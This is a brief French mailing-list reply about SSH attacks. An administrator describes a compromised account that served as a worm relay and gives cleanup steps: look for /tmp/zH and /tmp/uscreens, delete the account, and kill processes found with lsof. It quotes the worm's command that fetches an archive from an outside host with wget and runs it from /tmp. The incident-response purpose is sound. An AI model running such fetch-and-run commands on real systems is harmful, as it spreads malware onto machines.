Re: Attaques SSH

Autor: P. Dumontroty
A: smorico, guilde
Assumpte: Re: Attaques SSH
On vient d'identifier un de nos compte utilisateur qui sert de relais
pour un ver.
Une fois la connexion faite sur le compte, il télécharge (wget
peace.110mb.com/zH.tar.gz) le ver dans /tmp et le lance en répétition
(./screen -r).

Le Pb est réglé chez nous.

Pour le trouver:
    - verifier si les répertoires /tmp/zH  et /tmp/uscreens existent.
    - suprimer le compte passerel
    - tuer les process .SCREEN,.... (pour les trouver: lsof | grep <le
compte> ou lsof | grep zH)

J'espère que ça va se calmer ?